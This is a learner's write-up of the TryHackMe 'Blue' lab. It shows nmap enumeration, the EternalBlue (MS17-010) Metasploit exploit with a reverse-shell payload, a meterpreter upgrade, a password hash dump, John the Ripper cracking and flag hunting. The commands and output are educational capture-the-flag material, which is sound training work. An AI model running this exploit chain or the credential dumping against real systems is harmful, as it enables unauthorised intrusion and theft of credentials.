TryHackMe: Blue

Room: https://tryhackme.com/room/blue

Learn to hack into Windows, leveraging common misconfigurations and issues.

Machine Compendium

This is my master list of information I have gathered about my target machine for use. As I progress through the room, I come back and add more information here.

{
     "MACHINE_IP": "10.10.234.175",
     "MACHINE_INFO" : {
         "os": "Windows 7 Professional 7601 SP1"
         "commonName": "Jon-PC"
     },
     "OPEN_PORTS": {
         135: {"msrpc", "Microsoft Windows RPC"},
         139: {"netbios-ssn", "Microsoft Windows netbios-ssn"},
         445: {"microsft-ds"},
         3389: {"ssl/ms-wbt-server"},
         49152: {"msrpc", "Microsoft Windows RPC"},
         49153: {"msrpc", "Microsoft Windows RPC"},
         49154: {"msrpc", "Microsoft Windows RPC"},
         49158: {"msrpc", "Microsoft Windows RPC"},
         49160: {"msrpc", "Microsoft Windows RPC"}
     },
     "CREDENTIALS":{
         "Administrator":"",
         "Guest":"",
         "Jon":"alqfna22",
     },
     "OTHER_INFO": {
         "vulnerabilities": ["ms17-010 - External Blue"]
     }
 }

Enumeration

Let’s first start with an nmap scan of the room to check for common open ports

nmap -v 10.10.234.175 -A

This reveals our PC is named Jon-PC, we have 9 ports open, and we are running Windows 7 Pro 7601 SP1.

After googling this particular version, we can see this machine is vulnerable to an SMB exploit MS17-010.

Gain Access

We will start up Metasploit and do a search for MS17 to find the exploit

> msfconsole
msf6 > search ms17
msf6 > use exploit/windows/smb/ms17_010_eternalblue
# now lets look into and set our options
msf6 exploit(windows/smb/ms17_010_eternalblue) > options
Module options (exploit/windows/smb/ms17_010_eternalblue):

   Name           Current Setting  Required  Description
   ----           ---------------  --------  -----------
   RHOSTS         10.10.234.175    yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT          445              yes       The target port (TCP)
   SMBDomain      .                no        (Optional) The Windows domain to use for authentication
   SMBPass                         no        (Optional) The password for the specified username
   SMBUser                         no        (Optional) The username to authenticate as
   VERIFY_ARCH    true             yes       Check if remote architecture matches exploit Target.
   VERIFY_TARGET  true             yes       Check if remote OS matches exploit Target.

Payload options (windows/x64/shell/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.6.xxx.xxx      yes       The listen address (an interface may be specified)
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Windows 7 and Server 2008 R2 (x64) All Service Packs

I already have set up our machine as the LHOST and our targets machine as the RHOSTS. I also set the payload to windows/x64/shell/reverse_tcp. Let’s run it!

And we’re in!

Escalate Privileges

For now, lets CTRL + Z to background the shell so we can use Metasploit to convert the shell to meterpreter. After doing a search for shell_to_meterpreter, we find a module we can use! Let’s do the same thing and look at the options to set before we execute.

msf6 exploit(windows/smb/ms17_010_eternalblue) > search shell_to_meterpreter
msf6 exploit(windows/smb/ms17_010_eternalblue) > use 0
msf6 post(multi/manage/shell_to_meterpreter) > options
Module options (post/multi/manage/shell_to_meterpreter):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   HANDLER  true             yes       Start an exploit/multi/handler to receive the connection
   LHOST                     no        IP of host that will receive the connection from the payload (Will
                                        try to auto detect).
   LPORT    4433             yes       Port for payload to connect to.
   SESSION                   yes       The session to run this module on.

Now I am going to set my LHOST value to ensure it uses the right IP, and I ran sessions to see my sessions:

msf6 post(multi/manage/shell_to_meterpreter) > sessions -l

Active sessions
===============

  Id  Name  Type               Information  Connection
  --  ----  ----               -----------  ----------
  1         shell x64/windows               10.6.xx.xxx:4444 -> 10.10.234.175:49196 (10.10.234.175)

We can see the active shell is on session 1, so I passed 1 to SESSION. Now let’s go!

Success! And We can see we are now NT AUTHORITY\SYSTEM. But our exploit’s process may not be running as the system, so let’s run ps to find some processes and try to migrate to one of the PIDs.

Password Cracking

Now that our meterpreter shell is elevated, we can run hashdump to dump all the passwords on the machine. We have 3 hashes for Administrator, Guest and Jon. I copied these to my clipboard and saved them to a file on my kali machine. Now we need to boot John the Ripper to crack them!

┌──(kali㉿kali)-[~]
└─$ cat win_hash.txt
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Jon:1000:aad3b435b51404eeaad3b435b51404ee:ffb43f0de35be4d9917ac0cc8ad57f8d:::                                                                                                                                                                                                  
┌──(kali㉿kali)-[~]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt win_hash.txt --format=nt
Using default input encoding: UTF-8
Loaded 2 password hashes with no different salts (NT [MD4 256/256 AVX2 8x3])
Warning: no OpenMP support for this hash type, consider --fork=2
Press 'q' or Ctrl-C to abort, almost any other key for status
                 (Administrator)
alqfna22         (Jon)
2g 0:00:00:00 DONE (2021-03-18 16:09) 2.040g/s 10408Kp/s 10408Kc/s 10413KC/s alr19882006..alpusidi
Warning: passwords printed above might not be all those cracked
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed

We got the password for Jon! I added that to our compendium.

Flags

Now let’s go and find the flags.

Flag 1

Flag 1 is at System Root so lets cd / and we see flag1.txt!

Flag 2

Flag 2 is where passwords are stored. This would be in C:\\Windows\\System32\\config\\sam, so if we cd to the config directory, we see flag2.txt!

Flag 3

Flag 3 is in an “excellent location to loot. After all, Administrators usually have pretty interesting things saved.” First I

Flag 3 is in an “excellent location to loot. After all, Administrators usually have pretty interesting things saved.” First I cd into Users to see what accounts are here. There is no Administrator account, but there is Jon‘s account and we already know this PC is named Jon-PC. So let’s cd into his folder, and check out his Documents. And Voila! Flag3.

Wrap Up

This was a pretty fun intro for me! I have used metasploit and john the ripper a bit, but launching and exploit and then reusing the session to elevate access was new for me. A great learning experience!

Comments

No comments available.

Leave a Reply

Your email address will not be published. Required fields are marked *